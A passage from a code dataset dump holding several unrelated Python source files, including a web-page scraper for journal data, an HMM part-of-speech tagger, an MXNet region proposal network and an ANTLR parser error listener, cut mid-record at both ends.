models.ForeignKey(Group)\n place = models.IntegerField()\n\n slot = models.OneToOneField(BracketSlot, related_name='transition')\n\n def __unicode__(self):\n return '%s%s' % (self.group.name, self.place)\n","sub_path":"pingpong/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"459142150","text":"import csv\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\n#This project takes a HTML webpage consisting of book information and returns a list of them in a csv file based on the subject matter. \r\n\r\nin_F = open(\"ProQuestDocuments-2018-09-20.html\", \"r\")\r\nout_F = open(\"Results.csv\", \"w\")\r\n\r\nsoup = BeautifulSoup(in_F, 'html.parser')\r\nbooks = soup.find_all(\"div\")\r\nbookInfo = []\r\nfor item in books:\r\n\ttitle = ''\r\n\tauthor = ''\r\n\tpubYear = ''\r\n\tISSN = ''\r\n\tattributes = item.find_all(\"p\")\r\n\ttitle = attributes[1].getText()\r\n\tfor para in attributes:\r\n\t\tif(re.search(\"Correspondence author\", para.getText())):\r\n\t\t\tauthor = para.getText().replace(\"Correspondence author: \",\"\")\r\n\t\tif(re.search(\"Publication year\", para.getText())):\r\n\t\t\tpubYear = para.getText().replace(\"Publication year: \",\"\")\r\n\t\tif(re.search(\"ISSN\", para.getText())):\r\n\t\t\tISSN = para.getText().replace(\"ISSN: \",\"\")\r\n\tbookInfo.append([title, author, pubYear, ISSN])\r\nlistWriter = csv.writer(out_F, delimiter=',')\r\nlistWriter.writerow(['Title', 'Correspondence Author', 'Publication Year', 'ISSN'])\r\nfor book in bookInfo:\r\n\tlistWriter.writerow([book[0], book[1], book[2], book[3]])\r\nout_F.close()\r\nin_F.close()","sub_path":"Book List Scraper/Source/JournalListScraper.py","file_name":"JournalListScraper.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"455308007","text":"from message import Message\nclass Sms(Message):\n nl = '\\n'\n def __init__(self):\n self.nr_od = 505050505\n self.nr_do = 707070707\n self.temat = 'temat'\n def send(self):\n print(f'Od: {self.nr_od}{Sms.nl}Do: {self.nr_do}{Sms.nl}Temat: {self.temat}{Sms.nl}Tresc: {self.message}')\n\nx = Sms()\nx.set_message('witam panstwa, witam')\nx.send()\n","sub_path":"07-ObjectOrientedProgramming/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"348788362","text":"import sys\nimport numpy as np\nimport tifffile\nimport gi\nimport ufo.numpy\ngi.require_version('Ufo', '0.0')\nfrom gi.repository import Ufo\n\n\ndef write_image(path, image):\n try:\n image[0]\n except:\n image = [image]\n tifffile.imsave(path, np.array([image]).astype(np.float32))\n\n\ndef make_input(width, height):\n # Mean is not zero, so skew and kurtosis will work\n return np.linspace(0, 1, num=width * height).reshape(height, width).astype(np.float32) ** 2\n\n\ndef measure_numpy(path, metric, axis, width, height):\n image = make_input(width, height).astype(np.float)\n\n if metric == 'skew':\n from scipy.stats import skew\n func = skew\n elif metric == 'kurtosis':\n from scipy.stats import kurtosis\n func = kurtosis\n else:\n func = getattr(np, metric)\n\n result = func(image, axis=1 - axis if axis != -1 else None)\n write_image(path, result)\n\n\ndef measure_ufo(out_path, metric, axis, width, height):\n pm = Ufo.PluginManager()\n sched = Ufo.Scheduler()\n graph = 
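The scraper above pulls labeled fields out of each record's `<p>` tags with `re.search` and prefix stripping. A toy, self-contained reproduction of that extraction; the markup is invented for illustration:

```python
import re
from bs4 import BeautifulSoup

# Toy record: a <div> whose <p> tags carry "Label: value" lines (markup invented).
html = """
<div>
  <p>Record</p>
  <p>A Study of Things</p>
  <p>Correspondence author: J. Doe</p>
  <p>Publication year: 2018</p>
  <p>ISSN: 1234-5678</p>
</div>
"""

soup = BeautifulSoup(html, "html.parser")
for item in soup.find_all("div"):
    paras = item.find_all("p")
    title = paras[1].get_text()          # title lives in the second <p>, as above
    author = year = issn = ""
    for p in paras:
        text = p.get_text()
        if re.search("Correspondence author", text):
            author = text.replace("Correspondence author: ", "")
        elif re.search("Publication year", text):
            year = text.replace("Publication year: ", "")
        elif re.search("ISSN", text):
            issn = text.replace("ISSN: ", "")
    print([title, author, year, issn])   # ['A Study of Things', 'J. Doe', '2018', '1234-5678']
```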
Ufo.TaskGraph()\n    input_path = 'data/measure.tif'\n\n    image = make_input(width, height)\n    tifffile.imsave(input_path, image)\n\n    reader = pm.get_task('read')\n    measure = pm.get_task('measure')\n    output = Ufo.OutputTask()\n\n    reader.props.path = input_path\n    measure.props.axis = axis\n    measure.props.metric = metric\n\n    graph.connect_nodes(reader, measure)\n    graph.connect_nodes(measure, output)\n\n    sched.run(graph)\n\n    buf = output.get_output_buffer()\n    gpu_result = ufo.numpy.asarray(buf)\n    write_image(out_path, gpu_result)\n\n\ndef main():\n    reference_path, out_path, metric, axis, width, height = sys.argv[1:]\n    axis = int(axis)\n    width = int(width)\n    height = int(height)\n\n    try:\n        measure_numpy(reference_path, metric, axis, width, height)\n        measure_ufo(out_path, metric, axis, width, height)\n    except Exception as e:\n        sys.stderr.write(str(e))\n        sys.exit(1)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"test-measure.py","file_name":"test-measure.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"375175604","text":"import time\nclass CryptoExchange:\n\n    def __init__(self, exchange):\n        self.exchange = exchange\n        self.exchange.load_markets()\n\n    def fetch_ticker(self, symbol):\n        # retry in case of exception\n        value = None\n        num_tries = 0\n        while num_tries < 5:\n            try:\n                value = self.exchange.fetch_ticker(symbol=symbol)\n                break\n            except Exception:\n                message = \"exception in fetch_ticker, sleeping for 0.5 sec\\n\"\n                print(message)\n                time.sleep(0.5)\n                num_tries = num_tries + 1\n                continue\n        return value\n\n    # TODO: add methods to execute orders\n","sub_path":"Exchange.py","file_name":"Exchange.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"420967115","text":"# String basics: concatenation\nwhat_he_does = ' plays '\nhis_instrument = 'guitar'\nhis_name = 'Robert Johnson'\nartist_intro = his_name + what_he_does + his_instrument\n\nprint(artist_intro)\n\n# Mixing strings and numbers\nnum = 1\nstringNum = '9'\nnum2 = int(stringNum)\n\nprint(num + num2)\n\n# String repetition (multiplying a string)\nwords = 'word ' * 3\nprint(words)\n\n# String slicing and indexing: [0:n] means items 0 through n-1\nname = 'My name is marco'\nprint(name[-1])\nprint(name[:-1])\n\n# game\nword = 'friends'\nfind_the_evil_in_your_friends = word[0]+word[2:4]+word[-3:-1]\nprint(find_the_evil_in_your_friends)\n\n# Extracting a file name from a URL string\nurl = 'http://ww1.site.cn/14d2e8ejw1exjogbxdxhj20ci0kuwex.jpg'\nfile_name = url[-10:]\nprint(file_name)","sub_path":"exercise_bak/5_Python/0_PythonGramLearn/1-chars.py","file_name":"1-chars.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"299812534","text":"# Currently reads in the names of the training files, test file and output file,\r\n# and calls the tagger (which you need to implement)\r\nimport os\r\nimport sys\r\nimport re\r\nimport math\r\nimport numpy as np\r\n\r\n# this is vanilla Viterbi as taught in lecture\r\n# take the log of the probability before normalizing, and preload all probabilities with 0.01 to avoid all-zero columns.\r\n# this implementation currently does not use numpy... so it has efficiency issues. But it runs within a minute on my machine, so hopefully it isn't too slow...\r\n# reads sentences, and does tagging for every .!;? (which must be PUN) to mitigate some efficiency issues.\r\n# preloads some symbols that are repeatedly misclassified\r\n# achieves an accuracy of around 80%... 
a bit far from 90% but this is best I can do(already late)\r\n\r\n#A is transition matrix, B is emission matrix,P is the initial probability \r\n#assume there are no more than 200000 distinct words in both training and test.\r\n\r\ntaglist = [\"AJ0\",\"AJC\",\"AJS\",\"AT0\",\"AV0\",\"AVP\",\"AVQ\",\"CJC\",\"CJS\",\"CJT\",\"CRD\",\"DPS\",\"DT0\",\"DTQ\",\"EX0\",\"ITJ\",\"NN0\",\"NN1\",\"NN2\",\"NP0\",\"ORD\",\"PNI\",\"PNP\",\"PNQ\",\"PNX\",\"POS\",\"PRF\",\"PRP\",\"PUL\",\"PUN\",\"PUQ\",\"PUR\",\"TO0\",\"UNC\",\"VBB\",\"VBD\",\"VBG\",\"VBI\",\"VBN\",\"VBZ\",\"VDB\",\"VDD\",\"VDG\",\"VDI\",\"VDN\",\"VDZ\",\"VHB\",\"VHD\",\"VHG\",\"VHI\",\"VHN\",\"VHZ\",\"VM0\",\"VVB\",\"VVD\",\"VVG\",\"VVI\",\"VVN\",\"VVZ\",\"XX0\",\"ZZ0\",\"AJ0-NN1\",\"AJ0-VVD\",\"AJ0-VVG\",\"AJ0-VVN\",\"AV0-AJ0\",\"AVP-PRP\",\"AVQ-CJS\",\"CJS-AVQ\",\"CJS-PRP\",\"CJT-DT0\",\"CRD-PNI\",\"DT0-CJT\",\"NN1-AJ0\",\"NN1-NP0\",\"NN1-VVB\",\"NN1-VVG\",\"NN2-VVZ\",\"NP0-NN1\",\"PNI-CRD\",\"PRP-AVP\",\"PRP-CJS\",\"VVB-NN1\",\"VVD-AJ0\",\"VVD-VVN\",\"VVG-AJ0\",\"VVG-NN1\",\"VVN-AJ0\",\"VVN-VVD\",\"VVZ-NN2\",\"AJ0-AV0\"]\r\ntagdict = {}\r\nreversedict = {}\r\nworddict = {}\r\n#preloaded tags, to be built manually\r\npreload = {\"a\":\"AT0\",\"that\":\"CJT\",\"of\":\"PRF\",\"at\":\"PRP\",\"the\":\"AT0\",\",\":\"PUN\",\"had\":\"VHD\",\"there\":\"EX0\",\"was\":\"VBD\",\"he\":\"PNP\",\"with\":\"PRP\",\"to\":\"TO0\",\"both\":\"AV0\",\"all\":\"DT0\",\"around\":\"AVP\",\"on\":\"PRP\",\"him\":\"PNP\",\"for\":\"CJS\",\"now\":\"AV0\",\"make\":\"VVI\",\"before\":\"AV0\",\"about\":\"PRP\",\"one\":\"CRD\",\"it\":\"PNP\"}\r\n\r\nA = []\r\nB = []\r\nP = []\r\ncountP = 0\r\ncountA = []\r\ncountB = []\r\nnumwords = 0\r\n\r\nprob_trellis = []\r\npath_trellis = []\r\n\r\ndef train(training_file):\r\n global countP\r\n global numwords\r\n rd = open(training_file,\"r\",errors='replace')\r\n outList = rd.readlines()\r\n last = None\r\n for line in outList:\r\n split = line.split()\r\n word = split[0]\r\n tag = split[2]\r\n if(len(split)>2):\r\n split = line.split(\" : \")\r\n word = split[0]\r\n tag = split[1].split()[0]\r\n #update P\r\n #print(tag)\r\n i = tagdict.get(tag)\r\n P[i]+= 1\r\n countP+=1\r\n #update A\r\n if(last!=None):\r\n A[tagdict.get(last)][tagdict.get(tag)]+=1\r\n countA[tagdict.get(last)]+=1\r\n last = tag\r\n #update B\r\n wordindex = worddict.get(word,-1)\r\n if(wordindex==-1):\r\n worddict.update({word:numwords})\r\n wordindex = numwords\r\n numwords+=1\r\n countB[tagdict.get(tag)]+=1\r\n B[tagdict.get(tag)][wordindex]+=1\r\n\r\n#find the most probable word lists\r\n#path_trellis is an array of numbers,translate it into word tags. 
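\r\n# A minimal log-space sketch (commented out; it assumes only the globals defined above).\r\n# Summing logs instead of multiplying probabilities avoids the underflow that the\r\n# per-column renormalization below works around:\r\n#   import math\r\n#   def log_score(x, s, num, obs):\r\n#       # transition from tag x at position num-1 to tag s, emitting observation obs\r\n#       return (math.log(prob_trellis[x][num - 1] + 1e-300)\r\n#               + math.log(A[x][s]) + math.log(B[s][obs]))\r\n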
\r\ndef findx(s,num,obs):\r\n maxprob = 0\r\n maxindex = -1\r\n for x in range(len(taglist)):\r\n prob = prob_trellis[x][num-1]*A[x][s]*B[s][obs]\r\n if(prob>maxprob):\r\n maxprob = prob\r\n maxindex = x\r\n return maxindex\r\n\r\n \r\ndef findmax(prob_trellis,index):\r\n maxprob = 0\r\n maxindex = 0\r\n for x in range(len(taglist)):\r\n prob = prob_trellis[x][index]\r\n if(prob>=maxprob):\r\n maxprob = prob\r\n maxindex = x\r\n return maxindex\r\n\r\n#clean a,b,p\r\ndef clean():\r\n #total = []\r\n for i in range(len(P)):\r\n P[i] = P[i]/countP\r\n\r\n for i in range(len(tagdict)):\r\n sumB = 0\r\n for j in range(len(tagdict)):\r\n if(countA[i]==0):\r\n A[i][j]=0.000001\r\n continue\r\n A[i][j] = A[i][j]/countA[i]\r\n\r\n for j in range(len(worddict)):\r\n if(countB[i]==0):\r\n B[i][j]=0.000001\r\n continue\r\n B[i][j] = B[i][j]/countB[i]\r\n\r\n #print(total)\r\n \r\ndef v_sentence(sentence,wr,punctuation):\r\n\r\n default = worddict.get(sentence[0])\r\n if default == None:\r\n default = 19\r\n\r\n for s in range(len(taglist)):\r\n #print(P[s] * B[s][worddict.get(outList[0],-1)])\r\n #print(counttag[s])\r\n prob_trellis[s][0] = P[s] * B[s][default]\r\n path_trellis[s][0] = [s]\r\n #handle never-before-seen words\r\n #print(prob_trellis[s][0])\r\n #for s in range(len(taglist)):\r\n # print(B[s][worddict.get(outList[0])])\r\n\r\n # o is the item number, obs is the observation\r\n for num in range(1,len(sentence)):\r\n #if it is one of our preloads\r\n\r\n obs = worddict.get(sentence[num])\r\n \r\n\r\n if(obs==None):\r\n obs = default\r\n\r\n total = 0\r\n for s in range(len(taglist)):\r\n\r\n if preload.get(sentence[num-1])!=None:\r\n tag = preload.get(sentence[num-1])\r\n x = tagdict.get(tag)\r\n \r\n else:\r\n x = findx(s,num,obs)\r\n\r\n if(x==-1):\r\n print(sentence)\r\n print(num)\r\n exit()\r\n\r\n #every round, not every state can be reached by some other state\r\n prob_trellis[s][num] = prob_trellis[x][num-1]*A[x][s]*B[s][obs]\r\n total += prob_trellis[s][num]\r\n new_path = list(path_trellis[x][num-1])\r\n new_path.append(s)\r\n path_trellis[s][num] = new_path\r\n #nomalize prob_trellis[s][num]\r\n for s in range(len(taglist)):\r\n prob_trellis[s][num] = prob_trellis[s][num]/total\r\n\r\n #for s in range(len(taglist)):\r\n # print(path_trellis[s][num])\r\n\r\n maxnum = findmax(prob_trellis,len(sentence)-1)\r\n writesentence(path_trellis[maxnum][len(sentence)-1],wr,sentence,punctuation)\r\n\r\ndef viberti(test_file,output_file):\r\n global numwords\r\n rd = open(test_file,\"r\")\r\n wr = open(output_file,\"w\")\r\n outList = rd.readlines()\r\n #clean the outlist\r\n for i in range(len(outList)):\r\n outList[i] = outList[i][:len(outList[i])-1]\r\n \r\n #print(outList)\r\n\r\n sentence = []\r\n for item in outList:\r\n if item == '.' or item == '!' or item == '?' 
or item == ';':\r\n v_sentence(sentence,wr,item)\r\n sentence = []\r\n else:\r\n sentence.append(item)\r\n\r\n\r\n#write the calculated word list to output\r\ndef writesentence(output,wr,sentence,punctuation):\r\n for i in range(len(output)):\r\n wr.write(sentence[i]+' : '+reversedict.get(output[i])+'\\n')\r\n wr.write(punctuation+' : '+'PUN'+'\\n')\r\n\r\ndef word(training_list, test_file, output_file):\r\n # Tag the words from the untagged input file and write them into the output file.\r\n # Doesn't do much else beyond that yet.\r\n print(\"Tagging the file.\")\r\n #\r\n # YOUR IMPLEMENTATION GOES HERE\r\n #\r\n for i in range(len(taglist)):\r\n tagdict.update({taglist[i]:i})\r\n reversedict.update({i:taglist[i]})\r\n\r\n for i in range(len(taglist)):\r\n P.append(0.01)\r\n countA.append(0.0)\r\n countB.append(0.0)\r\n temp = []\r\n for j in range(len(taglist)):\r\n temp.append(0.01)\r\n A.append(temp)\r\n\r\n temp = []\r\n for j in range(200000):\r\n temp.append(0.01)\r\n B.append(temp)\r\n prob_trellis.append(temp)\r\n\r\n temp = []\r\n for j in range(200000):\r\n temp.append([])\r\n path_trellis.append(temp)\r\n\r\n #print(len(B))\r\n #print(len(B[0]))\r\n\r\n for training_file in training_list:\r\n train(training_file)\r\n\r\n clean()\r\n viberti(test_file,output_file)\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n # Run the tagger function.\r\n print(\"Starting the tagging process.\")\r\n\r\n # Tagger expects the input call: \"python3 tagger.py -d -t -o \"\r\n parameters = sys.argv\r\n training_list = parameters[parameters.index(\"-d\")+1:parameters.index(\"-t\")]\r\n test_file = parameters[parameters.index(\"-t\")+1]\r\n output_file = parameters[parameters.index(\"-o\")+1]\r\n # print(\"Training files: \" + str(training_list))\r\n # print(\"Test file: \" + test_file)\r\n # print(\"Ouptut file: \" + output_file)\r\n\r\n # Start the training and tagging operation.\r\n word (training_list, test_file, output_file)","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"418603017","text":"#!/usr/bin/python3\n# Copyright 2017, Mengxiao Lin \n\n\"\"\"\nRPN: Region Proposal Network\n\"\"\"\n\nimport mxnet as mx\n\ndef setConvWeights(lv: mx.gluon.nn.Conv2D, rv: mx.gluon.nn.Conv2D):\n lv.weight.set_data(rv.weight.data())\n lv.bias.set_data(rv.bias.data())\n\nclass RPNFeatureExtractor(mx.gluon.Block):\n def __init__(self, **kwargs):\n super(RPNFeatureExtractor, self).__init__(**kwargs)\n self.conv1_1 = mx.gluon.nn.Conv2D(channels=64, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=3, activation='relu')\n self.conv1_2 = mx.gluon.nn.Conv2D(channels=64, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=64, activation='relu')\n self.pool1 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv2_1 = mx.gluon.nn.Conv2D(channels=128, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=64, activation='relu')\n self.conv2_2 = mx.gluon.nn.Conv2D(channels=128, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=128, activation='relu')\n self.pool2 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv3_1 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=128, activation='relu')\n self.conv3_2 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), 
in_channels=256, activation='relu')\n self.conv3_3 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=256, activation='relu')\n self.pool3 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv4_1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=256, activation='relu')\n self.conv4_2 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv4_3 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.pool4 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n \n self.conv5_1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv5_2 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv5_3 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n\n def init_by_vgg(self, ctx):\n self.collect_params().initialize(mx.init.Normal(), ctx=ctx)\n vgg16 = mx.gluon.model_zoo.vision.vgg16(pretrained=True)\n setConvWeights(self.conv1_1, vgg16.features[0])\n setConvWeights(self.conv1_2, vgg16.features[2])\n setConvWeights(self.conv2_1, vgg16.features[5])\n setConvWeights(self.conv2_2, vgg16.features[7])\n setConvWeights(self.conv3_1, vgg16.features[10])\n setConvWeights(self.conv3_2, vgg16.features[12])\n setConvWeights(self.conv3_3, vgg16.features[14])\n setConvWeights(self.conv4_1, vgg16.features[17])\n setConvWeights(self.conv4_2, vgg16.features[19])\n setConvWeights(self.conv4_3, vgg16.features[21])\n setConvWeights(self.conv5_1, vgg16.features[24])\n setConvWeights(self.conv5_2, vgg16.features[26])\n setConvWeights(self.conv5_3, vgg16.features[28])\n\n def forward(self, x, *args):\n features = []\n f = self.conv1_1(x)\n f = self.conv1_2(f)\n f = self.pool1(f)\n \n f = self.conv2_1(f)\n f = self.conv2_2(f)\n f = self.pool2(f)\n\n f = self.conv3_1(f)\n f = self.conv3_2(f)\n f = self.conv3_3(f)\n f = self.pool3(f)\n\n f = self.conv4_1(f)\n f = self.conv4_2(f)\n f = self.conv4_3(f)\n f = self.pool4(f)\n f = self.conv5_1(f)\n f = self.conv5_2(f)\n f = self.conv5_3(f)\n return f\n\n\nclass DetectorHead(mx.gluon.Block):\n def __init__(self, num_anchors, **kwargs):\n super(DetectorHead, self).__init__(**kwargs)\n self.conv1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), padding=(1,1), activation='relu', weight_initializer=mx.init.Normal(0.01))\n self.conv_cls = mx.gluon.nn.Conv2D(channels=2*num_anchors, kernel_size=(1, 1),padding=(0, 0), weight_initializer=mx.init.Normal(0.01))\n self.conv_reg = mx.gluon.nn.Conv2D(channels=4*num_anchors, kernel_size=(1, 1), padding=(0, 0), weight_initializer=mx.init.Normal(0.01))\n \n def forward(self, feature, *args):\n f = self.conv1(feature)\n f_cls = self.conv_cls(f)\n f_reg = self.conv_reg(f)\n return f_cls, f_reg\n\n def init_params(self, ctx):\n self.collect_params().initialize(ctx=ctx)\n\n\nclass RPNBlock(mx.gluon.Block):\n def __init__(self, num_anchors, **kwargs):\n super(RPNBlock, self).__init__(**kwargs)\n self.feature_exactor = RPNFeatureExtractor()\n self.head = DetectorHead(num_anchors)\n \n def forward(self, data, *args):\n f = self.feature_exactor(data)\n f_cls, f_reg = self.head(f)\n return f_cls, f_reg, f\n 
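\n    # A minimal usage sketch (hypothetical input size; assumes the stock mxnet/gluon API):\n    #   net = RPNBlock(num_anchors=9)\n    #   net.init_params(mx.cpu())\n    #   f_cls, f_reg, feat = net(mx.nd.zeros((1, 3, 600, 800)))\n    #   # four 2x2 poolings give a stride-16 feature map, so f_cls is\n    #   # (1, 18, 37, 50) and f_reg is (1, 36, 37, 50) for num_anchors=9\n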
\n    def init_params(self, ctx):\n        self.feature_exactor.init_by_vgg(ctx)\n        self.head.init_params(ctx)\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"213331932","text":"#!/usr/bin/python3\ndef matrix_divided(matrix, div):\n    result = []\n    result2 = []\n    lengths = []\n    if type(div) == type(1) or type(div) == type(1.0):\n        if div == 0:\n            raise ZeroDivisionError(\"division by zero\")\n    else:\n        raise TypeError(\"div must be a number\")\n    for x in matrix:\n        lengths.append(len(x))\n        if type(x) != list:\n            raise TypeError(\"matrix must be a matrix (list of lists) \\\nof integers/floats\")\n    if(len(set(lengths)) != 1):\n        raise TypeError(\"Each row of the matrix must have the same size\")\n    for i in matrix:\n        for j in i:\n            if not type(j) == type(1) and not type(j) == type(1.0):\n                raise TypeError(\"matrix must be a matrix (list of lists) \\\nof integers/floats\")\n            result.append(round(j / div, 2))\n        result2.append(result)\n        result = []\n    return result2\n","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"367449800","text":"from antlr4 import *\nfrom SimpleCodeLexer import SimpleCodeLexer\nfrom SimpleCodeListener import SimpleCodeListener\nfrom SimpleCodeParser import SimpleCodeParser\nfrom SimpleCodeVisitor import SimpleCodeVisitor\nimport sys\nfrom antlr4.tree.Tree import TerminalNodeImpl, ErrorNodeImpl\nfrom antlr4.error.ErrorListener import ErrorListener\nfrom antlr4.error.Errors import RecognitionException, NoViableAltException, InputMismatchException, FailedPredicateException, ParseCancellationException\n\nfilterList = ['IDENTIFIER', 'INTLITERAL',\n              'CHARLITERAL', 'STRINGLITERAL', 'BOOLEANLITERAL']\n\nfWrite = open(sys.argv[1] + '.out', 'w')\n\ndef printOutChildNode(child, lexers):\n    global filterList, fWrite\n    line = child.getSymbol().line\n    lexer = child.getText()\n    token = lexers.ruleNames[child.getSymbol().type - 1]\n    if (token in filterList):\n        fWrite.write('{0} {1} {2}\\n'.format(line, token, lexer))\n    else:\n        fWrite.write('{0} {1}\\n'.format(line, lexer))\n\n\ndef flattenTree(parent, lexers):\n    if (int(sys.argv[1]) == 1):\n        return\n    for i in range(parent.getChildCount()):\n        child = parent.getChild(i)\n        # if (not isinstance(child, ErrorNodeImpl)):\n        if (isinstance(child, TerminalNodeImpl)) and (child.getText().strip() != ''):\n            printOutChildNode(child, lexers)\n        else:\n            flattenTree(child, lexers)\n\n\nclass MyErrorListener(ErrorListener):\n    def __init__(self):\n        super(MyErrorListener, self).__init__()\n\n    def printSyntaxError(self, msg, line, column):\n        if not msg.find(\"' '\"):\n            fWrite.write(\n                '[Syntax Error] Line {0}, column {1}: {2}\\n'.format(line, column, msg))\n\n    def escapeWSAndQuote(self, s: str):\n        s = s.replace(\"\\n\", \"\\\\n\")\n        s = s.replace(\"\\r\", \"\\\\r\")\n        s = s.replace(\"\\t\", \"\\\\t\")\n        return \"'\" + s + \"'\"\n\n    def getTokenErrorDisplay(self, t: Token):\n        if t is None:\n            return \"\"\n        s = t.text\n        if s is None:\n            if t.type == Token.EOF:\n                s = \"\"\n            else:\n                s = \"<\" + str(t.type) + \">\"\n        return self.escapeWSAndQuote(s)\n\n    def reportNoViableAlternative(self, recognizer: Parser, e: NoViableAltException, line, column):\n        tokens = recognizer.getTokenStream()\n        if tokens is not None:\n            if e.startToken.type == Token.EOF:\n                input = 
\"\"\n else:\n input = tokens.getText()\n else:\n input = \"\"\n if (input.strip() != ''):\n msg = 'No viable alternative at input {0}'.format(\n self.escapeWSAndQuote(input))\n self.printSyntaxError(msg, line, column)\n\n def reportInputMismatch(self, recognizer: Parser, e: InputMismatchException, line, column):\n msg = \"Mismatched input {0}. Expected {1}\".format(self.getTokenErrorDisplay(\n e.offendingToken), e.getExpectedTokens().toString(recognizer.literalNames, recognizer.symbolicNames))\n self.printSyntaxError(msg, line, column)\n\n def reportFailedPredicate(self, recognizer, e, line, column):\n ruleName = recognizer.ruleNames[recognizer._ctx.getRuleIndex()]\n msg = \"Following Rule is error: {0}. Message: {1}\".format(\n ruleName, e.message)\n self.printSyntaxError(msg, line, column)\n\n def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):\n if isinstance(e, NoViableAltException):\n self.reportNoViableAlternative(recognizer, e, line, column)\n elif isinstance(e, InputMismatchException):\n self.reportInputMismatch(recognizer, e, line, column)\n elif isinstance(e, FailedPredicateException):\n self.reportFailedPredicate(recognizer, e, line, column)\n else:\n self.printSyntaxError(msg, line, column)\n\n\nERROR_DUPLICATE_VAR_DEFINE = 'Variable [{0}] is already declared with type [{1}]\\n'\nERROR_VAR_NOT_DEFINED = 'Variable [{0}] has not been defined\\n'\nERROR_VAR_EXCUTE_AS_FUNCTION = 'Variable [{0}] is not a function\\n'\nERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR = 'Type [{0}] is not compatible with operator [{1}]\\n'\nERROR_DATA_TYPE_DIFFERENT = \"Right hand side should be type [{0}], got type [{1}]\\n\"\nMAIN_METHOD_IS_NOT_AVAILABLE = \"There is no 'main' method is declared\\n\"\nERROR_ARRAY_ZERO_LENGTH = \"Array [{0}] is declared with zero-size\\n\"\nERROR_ARRAY_LENGTH_NOT_DEFINED = \"Array [{0}] is declared with wrong size\\n\"\nFUNCTION_NOT_DEFINED = \"Function [{0}] is not defined!\\n\"\nFUNCTION_PARAMS_MISMATCHED = \"Function [{0}] requires list parameters as {1}, which is actually as {2}\\n\"\nERROR_VOID_RETURN_DATA_TYPE = \"Void [{0}] can't return value, got type [{1}]\\n\"\nERROR_FUNCTION_RETURN_WRONG_TYPE = \"Function [{0}] expected return type as [{1}], got [{2}]\\n\"\nERROR_FUNCTION_RETURN_EMPTY = \"Function [{0}] expected return type as [{1}], got empty\\n\"\nERROR_ARRAY_INDEX_TYPE = \"Array [{0}] index type must be [int], got [{1}]\\n\"\nERROR_ARRAY_INDEX_UNDEFINED = \"Array [{0}] must have index, but got empty\\n\"\nERROR_RHS_IS_ARRAY = \"Right hand side of assignment must not be {0}\\n\"\nERROR_ARRAY_INDEX_OUT_OF_RANGE = \"Array [{0}] index is out of range, must be non-negative and less than [{1}], actually [{2}]\\n\"\nERROR_VAR_IS_NOT_ARRAY = \"[{0}] is not an array to iterate\\n\"\nERROR_IF_CONDITION_MUST_BE_BOOLEAN = 'Condition in if-else must be [boolean], got [{0}]\\n'\nERROR_ITERATOR_LOOP_NOT_INT = 'Iterator in Loop must be int-variable, got [{0}]\\n'\nERROR_MISSING_IDENTIFIER_FOR = 'For-loop is missing iterator\\n'\nERROR_PARAMS_FOR = 'For-loop got {0} param(s), expected 3\\n'\nERROR_INIT_VALUE_FOR = 'For-loop must have initialized value int-type, got 